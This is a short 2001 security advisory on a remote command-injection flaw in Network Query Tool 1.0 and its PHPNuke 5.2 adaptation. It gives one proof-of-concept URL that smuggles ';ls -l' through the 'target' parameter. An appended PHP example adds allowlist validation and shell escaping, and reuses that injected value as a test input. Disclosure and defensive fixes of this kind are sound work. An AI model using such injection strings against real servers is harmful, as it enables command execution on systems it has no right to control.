--[ Network Query Tool 1.0 and Network Query Tool 1.0 Adapted for PHPNuke 5.2 remote command execution ]--

Problem discovered: 22/10/2001
by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com | http://www.isecurelabs.com/article.php?sid=147

--[ Description ]--

Network Query Tool 1.0 Adapted for PHPNuke 5.2 is a PHP script that allows users to:

- Resolve/Reverse Lookup
- Get DNS Records
- Whois (Web)
- Whois (IP owner)
- Check port
- Ping host
- Traceroute to host

Network Query Tool does not check for special meta-characters like &;`'\"|*?~<>^()[]{}$\n\r. This allows any user to execute UNIX commands on the web server.

--[ Exploit ]--

Execute ls -al command.

http://www.TEST.com/network_query.php?portNum=80&queryType=all&target=www.someserver.com%3Bls+-l&Submit=Do+It

--[ Fix ]--

Coders have been alerted

--[ Information about Network Query Tool ]--

Network Query Tool 1.0
http://www.shat.net/php/nqt/

Network Query Tool 1.0 Adapted for PHPNuke 5.2
http://http://www.yacapa.com

---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.com
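
One way to add the missing input check described above, shown as an added example that is not Network Query Tool's own code. The function names and the ping invocation are assumptions, since the advisory does not show the script's source; the `target` and `portNum` parameters are the ones in the request above.

```php
<?php
// Added example: hypothetical helpers, not code from Network Query Tool.

// Allowlist check for "target": an IP literal or a DNS hostname, nothing else.
function nqt_validate_target(string $raw): ?string
{
    $t = trim($raw);
    if ($t === '' || strlen($t) > 253) {
        return null;
    }
    if (filter_var($t, FILTER_VALIDATE_IP) !== false) {
        return $t;
    }
    // Hostname labels: letters, digits, hyphen; no leading or trailing hyphen.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $ok = preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $t);
    return $ok === 1 ? $t : null;
}

// "portNum" must be a decimal integer in the TCP/UDP port range.
function nqt_validate_port(string $raw): ?int
{
    if (!ctype_digit($raw) || strlen($raw) > 5) {
        return null;
    }
    $p = (int) $raw;
    return ($p >= 1 && $p <= 65535) ? $p : null;
}

// Build the command only from a validated target; escapeshellarg() is a
// second layer in case the validation above is ever loosened.
function nqt_ping_command(string $target): string
{
    return 'ping -c 4 ' . escapeshellarg($target);
}

// Constructed sample inputs; the third is the decoded value from the advisory.
$targets = ['www.someserver.com', '192.0.2.10', 'www.someserver.com;ls -l',
            'a.example|b', "a.example\nb", '-c1.example'];
foreach ($targets as $s) {
    $t = nqt_validate_target($s);
    echo json_encode($s), ' => ',
         $t === null ? 'REJECTED' : nqt_ping_command($t), PHP_EOL;
}
foreach (['80', '80;ls', '70000'] as $s) {
    echo json_encode($s), ' => ', json_encode(nqt_validate_port($s)), PHP_EOL;
}
```

Rejecting anything outside the allowlist is safer than stripping the listed meta-characters, because a blocklist fails open when a character is missed.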